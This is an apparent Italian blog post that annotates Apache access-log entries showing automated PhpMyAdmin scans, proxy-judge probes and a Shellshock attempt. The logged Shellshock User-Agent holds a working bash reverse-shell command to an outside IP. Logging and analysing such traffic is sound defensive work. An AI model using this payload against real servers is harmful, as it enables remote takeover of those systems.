Ancora un po' di curiosita sui log di un server Apache 2
ci sono chiaramente dei tentativi mediante script automatici che cercano vulnerabilita' legate a PhpMyAdmin (in giallo) ed un attacco basato su shellshock (in rosso) nella speranza di trovare installato CPanel
Curiose invece le righe in verde in cui vengono effettuate richieste a servizi come proxyjudge che verificano lo stato dei proxy server (forse un modo per verificare se la macchina e' all'interno di un proxy???)
comunque come si vede le risposte del server sono della categoria 400 quindi il file non e' stato trovato
Interessante anche la riga in azzurro in cui viene fatta una richiesta che non risulta essere nel protocollo http
Per finire le nazionalita' dell'origine degli attacchi: in alcuni casi e' Taiwan, in altri Thailandia,
08.61.218.252 - - [29/Oct/2014:22:48:18 +0000] "GET /ujuj/uju/uj.php HTTP/1.1" 404 470 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:18 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:19 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:19 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
207.240.10.33 - - [29/Oct/2014:23:29:50 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 487 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"
85.25.72.86 - - [29/Oct/2014:23:30:56 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 0 "-" "-"
125.64.35.67 - - [30/Oct/2014:00:03:13 +0000] "GET http://6.url.cn/zc/chs/img/body.png HTTP/1.1" 404 450 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.3072; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0)"
61.58.204.97 - - [30/Oct/2014:00:42:07 +0000] "GET /hghg/hgh/hg.php HTTP/1.1" 404 470 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:08 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:09 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:10 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:50 +0000] "GET /kkkk/kkk/kk.php HTTP/1.1" 404 470 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:51 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:52 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:52 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
1.164.41.53 - - [30/Oct/2014:01:45:02 +0000] "CONNECT mx0.mail2000.com.tw:25 HTTP/1.0" 405 537 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:29 +0000] "GET /asas/asa/as.php HTTP/1.1" 404 470 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
64.4.97.21 - - [30/Oct/2014:06:37:26 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 0 "-" "-"
218.59.238.93 - - [30/Oct/2014:11:01:52 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [30/Oct/2014:11:02:14 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
124.122.165.64 - - [30/Oct/2014:08:53:09 +0000] "GET /vyvy/vyv/vy.php HTTP/1.1" 404 470 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:10 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:11 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:12 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
218.59.238.93 - - [29/Oct/2014:16:19:29 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:16:19:44 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:10:07:33 +0000] "GET http://www.proxyjudge.biz/az.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:10:39:54 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:11:12:40 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:11:13:49 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
221.165.35.130 - - [27/Oct/2014:23:25:57 +0000] "GET / HTTP/1.1" 200 11820 "-" "-"
65.99.238.246 - - [27/Oct/2014:23:43:43 +0000] "GET / HTTP/1.0" 200 11783 "-" "-"
218.59.238.93 - - [27/Oct/2014:23:46:01 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:00:48:51 +0000] "GET http://yazoodle.net/azenv.php HTTP/1.0" 404 463 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:00:57:38 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
61.19.199.74 - - [28/Oct/2014:01:05:10 +0000] "GET /zyzy/zyz/zy.php HTTP/1.1" 404 470 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:10 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:11 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:11 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
218.59.238.93 - - [28/Oct/2014:01:36:04 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:01:49:47 +0000] "GET http://www.mesregies.com/azz.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:02:50:52 +0000] "GET http://www.proxyjudge.biz/az.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:03:51:04 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
Iscriviti a:
Commenti sul post (Atom)
Alpine Linux 2024 su IBM A31
Ho provato a far resuscitare un IBM A31 destinato alla discarica. La macchina ha processore P4, 256 Mb di RAM, la batteria CMOS morta ed e...
-
In questo post viene indicato come creare uno scatterplot dinamico basato da dati ripresi da un file csv (nel dettaglio il file csv e' c...
-
Questo post e' a seguito di quanto gia' visto nella precedente prova Lo scopo e' sempre il solito: creare un sistema che permet...
-
La scheda ESP32-2432S028R monta un Esp Dev Module con uno schermo TFT a driver ILI9341 di 320x240 pixels 16 bit colore.Il sito di riferiment...
Nessun commento:
Posta un commento